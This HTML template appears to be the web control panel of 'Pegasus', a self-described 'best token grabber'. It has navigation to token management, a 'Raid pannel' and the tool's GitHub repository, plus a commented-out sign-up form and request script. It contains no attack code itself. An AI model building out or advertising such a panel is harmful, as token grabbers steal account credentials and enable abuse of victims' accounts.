<!DOCTYPE html>
<html>
    <header>
        <meta charset="utf-8">
        <title>Pegasus</title>
        <link rel="stylesheet" href="{{ url_for('static', filename='css/style.css') }}">
    </header>

    <body>
        <div class="navbar">
            <ul>
                <li><a href="/">Main Page</a></li>
                <li><a href="token">Manage Token</a></li>
                <li><a href="404.html">Raid pannel</a></li>
                <li><a href="https://github.com/Its-Vichy/Pegasus-Grabber" target="_blank">Github</a></li>
            </ul>
        </div>

        <p class='title_page'>The best token grabber.</p>

        <!-- <div class="Register">
            <ul>
                <input type="text" class="css-input" placeholder="Enter your key" required/> <br><br>
                <button id="create-acc" class="button" type="submit">Create account</button>
            </ul>
        </div> -->
    </body>

    <!-- <script>
        document.getElementById('create-acc').addEventListener('click', function () {
            const req = new XMLHttpRequest()

            req.open("POST", `${document.getElementById('').textContent}`, true)
            req.send()
        })
    </script> -->
</html>